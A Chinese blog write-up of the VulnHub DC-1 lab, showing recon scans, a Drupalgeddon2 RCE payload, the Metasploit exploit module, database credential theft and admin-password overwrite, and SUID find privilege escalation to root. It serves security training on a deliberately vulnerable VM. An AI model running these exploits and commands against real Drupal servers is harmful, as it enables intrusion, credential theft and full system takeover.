vulnhub系列:DC-1

vulnhub系列:DC-1

靶机下载

一、信息收集

nmap 扫描存活,根据 mac 地址寻找 IP

nmap 192.168.23.0/24

nmap扫描网段

nmap 扫描端口

nmap 192.168.23.141 -p- -Pn -sV -O

nmap扫描端口

dirsearch 目录扫描

python3 dirsearch.py -u http://192.168.23.141/

目录扫描

访问80端口

80页面

查看 wappalyzer 插件信息

wappalyzer

目前基本信息

IP地址:192.168.23.141
开放端口:22、80、111、37573
Drupal 7
php 5.4.45
jQuery 1.4.4

直接搜索 Drupal 的漏洞

搜索Drupal漏洞

根据文章给出的POC尝试远程代码执行

POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host: 192.168.23.141
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 104

form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=dir

远程代码执行POC1

试着换了几个命令好像没有执行

找找目录扫描扫出来的文件或目录

发现一个token字段

theme和token

账号注册等功能的页面

账号注册等页面

二、getshell

没找到啥东西,kali 使用工具

msfconsole

msf

查找 Drupal 的 exp

search Drupal

查找exp

利用漏洞

use exploit/unix/webapp/drupal_drupalgeddon2

use18年漏洞

查看漏洞模块参数

options

查看漏洞模块参数

可以看到 rhosts 需要填写,设置 rhosts 内容,然后查看模块

set rhosts 192.168.23.141

show options

设置被攻击IP后查看模块

设置好后攻击

run或者exploit

成功连接

run成功连接

输入 shell,执行命令

shell

shell执行命令

使用 python,提升交互性

python -c 'import pty; pty.spawn("/bin/bash")'

获取交互式shell

flag 1

查看当前目录,发现 flag1.txt,提示有一个配置文件

image-20240812191033661

flag 2

文档给出的配置文件名为 settings.php,搜索文件

cat `find / -name settings.php`

翻了翻看到 flag 2 和数据库账号密码,flag 2 提示,暴力破解和字典攻击不是唯一方法,需要访问权限,能用这些证书做什么?

dbuser:R0ck3t

setting文件得到数据库账号密码

连接数据库

mysql -u dbuser -pR0ck3t

连接数据库

进入数据库查看以下数据

show databases;

查看库名

查看 drupaldb 库下表名

use drupaldb;
show tables;

查看表名

可以看到有一个 users 表,查看一下其下数据

select * from users;

账号密码

发现 admin 和 Fred 用户,密码经过加密,update 修改密码

update users set pass=123456 where name="admin";

修改密码

页面尝试登录,登录失败,可能需要同样的加密方式

登录被限制

百度一下怎么做

image-20240812192352469

这里我用方法二,执行命令

php scripts/password-hash.sh admin

$S$D65v3m6Cw02rYa9zUwTmjtFHWy5OEneOVUyXMBjs5AxfiiNXgkYU

image-20240812193243240

得到密码 admin 的 hash 值,进入数据库修改密码

mysql -u dbuser -pR0ck3t

use drupaldb;

update users set pass="$S$D65v3m6Cw02rYa9zUwTmjtFHWy5OEneOVUyXMBjs5AxfiiNXgkYU" where name="admin";

image-20240812193440056

重新登录80端口页面,登录成功

admin:admin

image-20240812194029860

flag 3

在图中位置发现 flag 3,特殊的 PERMS 能帮我找到密码,提示 -exec,应该是要 suid 提权

image-20240812193916970

image-20240812193939469

三、提权

查看 suid 权限的可执行程序

find / -perm -4000 2>/dev/null

image-20240812194451524

依次寻找测试,find 可利用,提权成功

find / -name flag1.txt -exec "/bin/bash" -p \; -quit

image-20240812195458173

在 root 目录下发现 thefinalflag.txt ,查看内容

image-20240812195644617

flag 4

在 home 目录下发现 flag4.txt

image-20240812200105405

  • 5
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值